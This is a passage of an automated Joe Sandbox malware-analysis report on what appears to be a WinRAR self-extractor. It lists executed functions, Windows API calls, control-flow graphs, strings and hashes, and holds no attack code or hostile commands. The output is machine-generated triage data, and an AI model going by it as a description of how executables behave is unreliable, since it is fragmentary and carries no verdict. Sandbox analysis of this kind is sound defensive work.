21996->21998 22013 172636 21998->22013 21999 1721e8 22012 175d1d 26 API calls _abort 21999->22012 22003 16d783 _ValidateLocalCookies 5 API calls 22005 153f4f SetDlgItemTextW 22003->22005 22005->21974 22006 17228b 22022 17283c 51 API calls 3 library calls 22006->22022 22009 1721f3 22009->22003 22010 172296 22023 1726b9 20 API calls _free 22010->22023 22011->21999 22012->22009 22014 172653 22013->22014 22015 172213 22013->22015 22014->22015 22024 17631f GetLastError 22014->22024 22021 172601 20 API calls 2 library calls 22015->22021 22017 172674 22044 17646e 38 API calls __fassign 22017->22044 22019 17268d 22045 17649b 38 API calls __fassign 22019->22045 22021->22006 22022->22010 22023->22009 22025 176335 22024->22025 22026 17633b 22024->22026 22046 1778f8 11 API calls 2 library calls 22025->22046 22030 17638a SetLastError 22026->22030 22047 175a8d 22026->22047 22030->22017 22031 176355 22054 1759c2 22031->22054 22033 17636a 22033->22031 22035 176371 22033->22035 22061 176191 20 API calls _abort 22035->22061 22036 17635b 22038 176396 SetLastError 22036->22038 22062 175a4a 38 API calls _abort 22038->22062 22039 17637c 22041 1759c2 _free 20 API calls 22039->22041 22043 176383 22041->22043 22043->22030 22043->22038 22044->22019 22045->22015 22046->22026 22048 175a9a __CreateFrameInfo 22047->22048 22049 175ada 22048->22049 22050 175ac5 RtlAllocateHeap 22048->22050 22063 1746ca 7 API calls 2 library calls 22048->22063 22064 175e3e 20 API calls _abort 22049->22064 22050->22048 22052 175ad8 22050->22052 22052->22031 22060 17794e 11 API calls 2 library calls 22052->22060 22055 1759cd RtlFreeHeap 22054->22055 22056 1759f6 __dosmaperr 22054->22056 22055->22056 22057 1759e2 22055->22057 22056->22036 22065 175e3e 20 API calls _abort 22057->22065 22059 1759e8 GetLastError 22059->22056 22060->22033 22061->22039 22063->22048 22064->22052 22065->22059 23929 174bda 52 API calls 3 library calls 23849 16aa99 96 API calls 4 library calls 23873 15ddda FreeLibrary 23930 1663c3 115 API calls 23906 16aa99 101 API calls 4 library calls 23907 177ecd 6 API calls _ValidateLocalCookies 23932 176fcb 71 API calls _free 23695 159bc8 23696 159bd4 23695->23696 23697 159bdb 23695->23697 23698 159be1 GetStdHandle 23697->23698 23700 159bec 23697->23700 23698->23700 23699 159c41 WriteFile 23699->23700 23700->23696 23700->23699 23701 159c11 WriteFile 23700->23701 23702 159c0c 23700->23702 23704 159cb4 23700->23704 23706 156d5a 56 API calls 23700->23706 23701->23700 23701->23702 23702->23700 23702->23701 23707 156f67 68 API calls 23704->23707 23706->23700 23707->23696 23908 1686cb 22 API calls 23874 16d5ff 27 API calls pre_c_initialization 23853 1788fb GetCommandLineA GetCommandLineW 23770 1518fb 127 API calls __EH_prolog 23855 17c0e4 51 API calls 23910 1516e3 79 API calls 23933 16c3ea 19 API calls ___delayLoadHelper2@8

                                                                                    Executed Functions

                                                                                    Function 0016C131 Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 199filesleeptimeCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 0015F353: GetModuleHandleW.KERNEL32 ref: 0015F36B
                                                                                      • Part of subcall function 0015F353: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0015F383
                                                                                      • Part of subcall function 0015F353: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0015F3A6
                                                                                      • Part of subcall function 00168B8E: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00168B96
                                                                                      • Part of subcall function 00169036: OleInitialize.OLE32(00000000), ref: 0016904F
                                                                                      • Part of subcall function 00169036: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00169086
                                                                                      • Part of subcall function 00169036: SHGetMalloc.SHELL32(001920E8), ref: 00169090
                                                                                      • Part of subcall function 00160722: GetCPInfo.KERNEL32(00000000,?), ref: 00160733
                                                                                      • Part of subcall function 00160722: IsDBCSLeadByte.KERNEL32(00000000), ref: 00160747
                                                                                    • GetCommandLineW.KERNEL32 ref: 0016C179
                                                                                    • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0016C1A0
                                                                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0016C1B1
                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0016C1EB
                                                                                      • Part of subcall function 0016BE0A: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0016BE20
                                                                                      • Part of subcall function 0016BE0A: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0016BE5C
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0016C1F4
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,001A7938,00000800), ref: 0016C20F
                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxname,001A7938), ref: 0016C221
                                                                                    • GetLocalTime.KERNEL32(?), ref: 0016C228
                                                                                    • _swprintf.LIBCMT ref: 0016C267
                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0016C279
                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0016C27C
                                                                                    • LoadIconW.USER32(00000000,00000064), ref: 0016C293
                                                                                    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_00019B4F,00000000), ref: 0016C2E4
                                                                                    • Sleep.KERNEL32(?), ref: 0016C312
                                                                                    • DeleteObject.GDI32 ref: 0016C351
                                                                                    • DeleteObject.GDI32(?), ref: 0016C35D
                                                                                      • Part of subcall function 0016A8D4: CharUpperW.USER32(?,?,?,?,00001000), ref: 0016A92C
                                                                                      • Part of subcall function 0016A8D4: CharUpperW.USER32(?,?,?,?,?,00001000), ref: 0016A953
                                                                                    • CloseHandle.KERNEL32 ref: 0016C39C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnvironmentFileHandleVariable$Module$AddressCharCloseDeleteObjectProcUpperView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                    • API String ID: 985665271-3710569615
                                                                                    • Opcode ID: 86a4fd95714ece7f38b723dad9b85c344a9ec8848586ef9606df78afe84bb1ee
                                                                                    • Instruction ID: b04e426cbec113583e4275872f033bbc4c25264001ae42a6dbdb6d3984221b18
                                                                                    • Opcode Fuzzy Hash: 86a4fd95714ece7f38b723dad9b85c344a9ec8848586ef9606df78afe84bb1ee
                                                                                    • Instruction Fuzzy Hash: AB61EA72904304AFD311AB65EC49E3737ECBB59754F04042AF981936A2DB749E94CBB2
                                                                                    Function 00168BD0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 92memorywindowCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 598 168bd0-168beb FindResourceW 599 168cc6-168cc8 598->599 600 168bf1-168c03 SizeofResource 598->600 601 168c05-168c14 LoadResource 600->601 602 168c23-168c25 600->602 601->602 603 168c16-168c21 LockResource 601->603 604 168cc5 602->604 603->602 605 168c2a-168c3f GlobalAlloc 603->605 604->599 606 168c41-168c4a GlobalLock 605->606 607 168cbf-168cc4 605->607 608 168c4c-168c6a call 16e000 CreateStreamOnHGlobal 606->608 609 168cb8-168cb9 GlobalFree 606->609 607->604 612 168cb1-168cb2 GlobalUnlock 608->612 613 168c6c-168c84 call 168b65 608->613 609->607 612->609 613->612 617 168c86-168c8e 613->617 618 168c90-168ca4 GdipCreateHBITMAPFromBitmap 617->618 619 168ca9-168cad 617->619 618->619 620 168ca6 618->620 619->612 620->619
                                                                                    APIs
                                                                                    • FindResourceW.KERNELBASE(00000066,PNG,?,?,00169AC8,00000066), ref: 00168BE1
                                                                                    • SizeofResource.KERNEL32(00000000,75295780,?,?,00169AC8,00000066), ref: 00168BF9
                                                                                    • LoadResource.KERNEL32(00000000,?,?,00169AC8,00000066), ref: 00168C0C
                                                                                    • LockResource.KERNEL32(00000000,?,?,00169AC8,00000066), ref: 00168C17
                                                                                    • GlobalAlloc.KERNELBASE(00000002,00000000,00000000,?,?,?,00169AC8,00000066), ref: 00168C35
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00168C42
                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00168C62
                                                                                    • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00168C9D
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00168CB2
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00168CB9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
                                                                                    • String ID: PNG
                                                                                    • API String ID: 3656887471-364855578
                                                                                    • Opcode ID: 228e201f6ed3fe1aa03b21c7919ad516329c9f7613a7a42839c093d5506db740
                                                                                    • Instruction ID: cd75e6b998f0f98e574f64709d9969da708d5db39a1e81a99fbda2ae7a3a84d5
                                                                                    • Opcode Fuzzy Hash: 228e201f6ed3fe1aa03b21c7919ad516329c9f7613a7a42839c093d5506db740
                                                                                    • Instruction Fuzzy Hash: E2219E71602706AFC7229F61DC4DDABBBA8EF897A1B004628F845C2660DB31CD54DBB0
                                                                                    Function 0015A273 Relevance: 7.6, APIs: 5, Instructions: 108fileCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 860 15a273-15a299 call 16cec0 863 15a30d-15a316 FindNextFileW 860->863 864 15a29b-15a2ae FindFirstFileW 860->864 865 15a32c-15a32e 863->865 866 15a318-15a326 GetLastError 863->866 867 15a334-15a3dd call 15f10e call 15b902 call 1601c1 * 3 864->867 868 15a2b4-15a2cf call 15b275 864->868 865->867 869 15a3e2-15a3f5 865->869 866->865 867->869 875 15a2e6-15a2ef GetLastError 868->875 876 15a2d1-15a2e4 FindFirstFileW 868->876 878 15a2f1-15a2f4 875->878 879 15a300 875->879 876->867 876->875 878->879 882 15a2f6-15a2f9 878->882 880 15a302-15a308 879->880 880->869 882->879 884 15a2fb-15a2fe 882->884 884->880
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0015A16E,000000FF,?,?), ref: 0015A2A8
                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0015A16E,000000FF,?,?), ref: 0015A2DE
                                                                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0015A16E,000000FF,?,?), ref: 0015A2E6
                                                                                    • FindNextFileW.KERNEL32(?,?,?,?,?,?,0015A16E,000000FF,?,?), ref: 0015A30E
                                                                                    • GetLastError.KERNEL32(?,?,?,?,0015A16E,000000FF,?,?), ref: 0015A31A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFind$ErrorFirstLast$Next
                                                                                    • String ID:
                                                                                    • API String ID: 869497890-0
                                                                                    • Opcode ID: c22509e67bd5c7f2dad3bf80c733cdeb450f110ee7a3e7c4790abaa43f390834
                                                                                    • Instruction ID: 44cdeb6cee6d927c21089ba266501a8a3eb198eefeb09789fb1b71739014fec9
                                                                                    • Opcode Fuzzy Hash: c22509e67bd5c7f2dad3bf80c733cdeb450f110ee7a3e7c4790abaa43f390834
                                                                                    • Instruction Fuzzy Hash: 4341A272608245EFC365DF64C880ADEF7E8BF49345F500A2AF9E9D3200D734A9588B92
                                                                                    Function 00174A5A Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(?,?,00174A30,?,00187F68,0000000C,00174B87,?,00000002,00000000), ref: 00174A7B
                                                                                    • TerminateProcess.KERNEL32(00000000,?,00174A30,?,00187F68,0000000C,00174B87,?,00000002,00000000), ref: 00174A82
                                                                                    • ExitProcess.KERNEL32 ref: 00174A94
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                    • String ID:
                                                                                    • API String ID: 1703294689-0
                                                                                    • Opcode ID: 347e6466763bfbf1b9ea371b58a463ea9e5852615036197b6a790a04fd907f17
                                                                                    • Instruction ID: 34a11f20017a7b7bd6b8885fb94d392e63ba2612a6b43e683174fc3a4c5d47fa
                                                                                    • Opcode Fuzzy Hash: 347e6466763bfbf1b9ea371b58a463ea9e5852615036197b6a790a04fd907f17
                                                                                    • Instruction Fuzzy Hash: 9AE0B631080508AFCF52AF64DD09A893B7DEF54391F018414F84A9B521CB35DE96DB84
                                                                                    Function 00158409 Relevance: 3.9, APIs: 2, Instructions: 888COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 0015840E
                                                                                    • _memcmp.LIBVCRUNTIME ref: 00158870
                                                                                      • Part of subcall function 001580F8: CharUpperW.USER32(?,?,00000000,?,?,?,?,?,?,?,00000800,?,001586E9,?,-00000930,?), ref: 001581BB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: CharH_prologUpper_memcmp
                                                                                    • String ID:
                                                                                    • API String ID: 4047935103-0
                                                                                    • Opcode ID: 6754fcf81dc10a152f866018712d9c4d1cbb6d1f8bd86e62a3df06fab4392334
                                                                                    • Instruction ID: f54e3f1c93d6377450f3893bb3e2f26cd4c1359ed6b377e1ddeb0b59609989be
                                                                                    • Opcode Fuzzy Hash: 6754fcf81dc10a152f866018712d9c4d1cbb6d1f8bd86e62a3df06fab4392334
                                                                                    • Instruction Fuzzy Hash: F5720B70504185EEDF25DF64C885BF9B7B9AF15301F0841BAED69AF182DB309A8DCB60
                                                                                    Function 00165984 Relevance: .3, Instructions: 325COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: 0d2b4e1a891bfc3382bc205793351769c97b0153b2423ac544beb661bc532afe
                                                                                    • Instruction ID: 8834dfc7f9a3e1c8abfab6a5b61bc3fea33a32757bc7f3776f66b686da784dc9
                                                                                    • Opcode Fuzzy Hash: 0d2b4e1a891bfc3382bc205793351769c97b0153b2423ac544beb661bc532afe
                                                                                    • Instruction Fuzzy Hash: ACD128B1A087459FCB14CF28CC8479BBBE2BF95308F08056DEC449B642D734E969CB96
                                                                                    Function 00169B4F Relevance: 95.2, APIs: 46, Strings: 8, Instructions: 724COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00169B54
                                                                                      • Part of subcall function 001512E7: GetDlgItem.USER32(00000000,00003021), ref: 0015132B
                                                                                      • Part of subcall function 001512E7: SetWindowTextW.USER32(00000000,001802E4), ref: 00151341
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prologItemTextWindow
                                                                                    • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                    • API String ID: 810644672-2803697902
                                                                                    • Opcode ID: 43ffe0614216c3054a385c5f2b7fa46ceab1c5bc8561163dbfe654a51140c342
                                                                                    • Instruction ID: cf565613259330d00b8c6e572852b188662703d42192cdd0409a463fb1f06435
                                                                                    • Opcode Fuzzy Hash: 43ffe0614216c3054a385c5f2b7fa46ceab1c5bc8561163dbfe654a51140c342
                                                                                    • Instruction Fuzzy Hash: A042F471A40344BFEB21AB609D89FEE3BACAF16701F440056FA51B64D1D7744EE8CB62
                                                                                    Function 0015F353 Relevance: 51.1, APIs: 22, Strings: 7, Instructions: 314libraryfileloaderCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 257 15f353-15f375 call 16cec0 GetModuleHandleW 260 15f377-15f38e GetProcAddress 257->260 261 15f3c8-15f62f 257->261 262 15f3a0-15f3aa GetProcAddress 260->262 263 15f390-15f39d 260->263 264 15f635-15f640 call 17462a 261->264 265 15f6fd-15f72e GetModuleFileNameW call 15b88c call 15f10e 261->265 262->261 266 15f3ac-15f3c3 262->266 263->262 264->265 271 15f646-15f673 GetModuleFileNameW CreateFileW 264->271 277 15f730-15f73a call 15a8e0 265->277 266->261 275 15f675-15f683 SetFilePointer 271->275 276 15f6f1-15f6f8 CloseHandle 271->276 275->276 278 15f685-15f6a2 ReadFile 275->278 276->265 283 15f747 277->283 284 15f73c-15f740 call 15f309 277->284 278->276 280 15f6a4-15f6c9 278->280 282 15f6e6-15f6ef call 15ef07 280->282 282->276 292 15f6cb-15f6e5 call 15f309 282->292 287 15f749-15f74b 283->287 289 15f745 284->289 290 15f76d-15f78f call 15b902 GetFileAttributesW 287->290 291 15f74d-15f76b CompareStringW 287->291 289->287 294 15f791-15f795 290->294 299 15f799 290->299 291->290 291->294 292->282 294->277 298 15f797 294->298 300 15f79d-15f7a2 298->300 299->300 301 15f7a4 300->301 302 15f7d6-15f7d8 300->302 303 15f7a6-15f7c8 call 15b902 GetFileAttributesW 301->303 304 15f8e5-15f8ef 302->304 305 15f7de-15f7f5 call 15b8d6 call 15a8e0 302->305 310 15f7d2 303->310 311 15f7ca-15f7ce 303->311 315 15f7f7-15f858 call 15f309 * 2 call 15d142 call 153f5b call 15d142 call 168ccb 305->315 316 15f85d-15f890 call 153f5b AllocConsole 305->316 310->302 311->303 313 15f7d0 311->313 313->302 323 15f8dd-15f8df ExitProcess 315->323 322 15f892-15f8d7 GetCurrentProcessId AttachConsole call 1720b3 GetStdHandle WriteConsoleW Sleep FreeConsole 316->322 316->323 322->323
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32 ref: 0015F36B
                                                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0015F383
                                                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0015F3A6
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0015F651
                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0015F669
                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0015F67B
                                                                                    • ReadFile.KERNEL32(00000000,?,00007FFE,00180858,00000000), ref: 0015F69A
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0015F6F2
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0015F708
                                                                                    • CompareStringW.KERNEL32(00000400,00001001,001808A4,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 0015F762
                                                                                    • GetFileAttributesW.KERNELBASE(?,?,00180870,00000800,?,00000000,?,00000800), ref: 0015F78B
                                                                                    • GetFileAttributesW.KERNEL32(?,?,00180930,00000800), ref: 0015F7C4
                                                                                      • Part of subcall function 0015F309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0015F324
                                                                                      • Part of subcall function 0015F309: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0015DEC8,Crypt32.dll,?,0015DF4A,?,0015DF2E,?,?,?,?), ref: 0015F346
                                                                                    • _swprintf.LIBCMT ref: 0015F834
                                                                                    • _swprintf.LIBCMT ref: 0015F880
                                                                                      • Part of subcall function 00153F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00153F6E
                                                                                    • AllocConsole.KERNEL32 ref: 0015F888
                                                                                    • GetCurrentProcessId.KERNEL32 ref: 0015F892
                                                                                    • AttachConsole.KERNEL32(00000000), ref: 0015F899
                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 0015F8BF
                                                                                    • WriteConsoleW.KERNEL32(00000000), ref: 0015F8C6
                                                                                    • Sleep.KERNEL32(00002710), ref: 0015F8D1
                                                                                    • FreeConsole.KERNEL32 ref: 0015F8D7
                                                                                    • ExitProcess.KERNEL32 ref: 0015F8DF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                                                                    • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                                    • API String ID: 1201351596-3298887752
                                                                                    • Opcode ID: efbce85062be4db53e11aeeff0479f80c06138c7f75705ee9c6572b7d8e7836c
                                                                                    • Instruction ID: 06eef43f4c8085a08d4639033ea8ab754bcd86d406d7d639662d80398a373e4a
                                                                                    • Opcode Fuzzy Hash: efbce85062be4db53e11aeeff0479f80c06138c7f75705ee9c6572b7d8e7836c
                                                                                    • Instruction Fuzzy Hash: 70D160B1408388DAD7B2EF50C949B9FB7E8AF89345F50092DF598AA140C7B0974DCF52
                                                                                    Function 0016AA45 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 438windowfileCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 404 16aa45-16aa5d call 16cdf0 call 16cec0 409 16b645-16b652 404->409 410 16aa63-16aa8d call 1696ec 404->410 410->409 413 16aa93-16aa98 410->413 414 16aa99-16aaa7 413->414 415 16aaa8-16aab8 call 1693ba 414->415 418 16aaba 415->418 419 16aabc-16aad1 call 160b12 418->419 422 16aad3-16aad7 419->422 423 16aade-16aae1 419->423 422->419 424 16aad9 422->424 425 16aae7 423->425 426 16b611-16b63c call 1696ec 423->426 424->426 427 16aaee-16aaf1 425->427 428 16ad7e-16ad80 425->428 429 16acdd-16acdf 425->429 430 16ad9b-16ad9d 425->430 426->414 438 16b642-16b644 426->438 427->426 433 16aaf7-16ab64 call 168b8e call 15b56e call 15a11c call 15a256 call 156fa3 call 15a1a9 427->433 428->426 432 16ad86-16ad96 SetWindowTextW 428->432 429->426 436 16ace5-16acf1 429->436 430->426 435 16ada3-16adaa 430->435 432->426 503 16ab6a-16ab70 433->503 504 16acc9-16acd8 call 15a132 433->504 435->426 439 16adb0-16adc9 435->439 440 16ad05-16ad0a 436->440 441 16acf3-16ad04 call 174654 436->441 438->409 443 16add1-16addf call 1720b3 439->443 444 16adcb 439->444 446 16ad14-16ad1f call 169844 440->446 447 16ad0c-16ad12 440->447 441->440 443->426 461 16ade5-16adee 443->461 444->443 451 16ad24-16ad26 446->451 447->451 454 16ad31-16ad51 call 1720b3 call 1720de 451->454 455 16ad28-16ad2f call 1720b3 451->455 479 16ad53-16ad5a 454->479 480 16ad6a-16ad6c 454->480 455->454 465 16ae17-16ae1a 461->465 466 16adf0-16adf4 461->466 467 16ae20-16ae23 465->467 468 16aeff-16af0d call 15f10e 465->468 466->465 